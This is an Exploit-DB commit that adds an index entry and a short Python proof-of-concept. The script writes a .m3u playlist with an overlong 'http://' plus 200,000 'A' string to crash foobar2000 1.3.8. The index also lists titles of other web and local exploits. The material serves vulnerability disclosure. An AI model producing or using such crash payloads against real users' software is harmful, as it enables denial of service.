DB: 2015-06-14

1 new exploits
This commit is contained in:
Offensive Security 2015-06-14 05:03:12 +00:00
parent 20d0fff830
commit 36b3c3268d
2 changed files with 20 additions and 0 deletions

View file

@ -33635,6 +33635,7 @@ id,file,description,date,author,platform,type,port
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0

Can't render this file because it is too large.

19
platforms/windows/dos/37267.py Executable file
View file

@ -0,0 +1,19 @@
# Exploit Title: foobar2000 1.3.8 (.m3u) Local Crash PoC
# Date: 12-06-2015
# Exploit Author: 0neb1n
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/e246984718ab7ab58fa1e0b072ff05a4/foobar2000_v1.3.8.exe
# Version: 1.3.8
# Tested on: Windows XP SP3 KOR
file = "poc.m3u"
data = 'http://' + '\x41' * 200000
fd = open(file, 'w')
fd.write(data)
fd.close()
print ""
print "[*] File successfully created !!"
print "[*] Author : 0neb1n"
print "[*] Mail : barcodecrow(at)gmail(dot)com"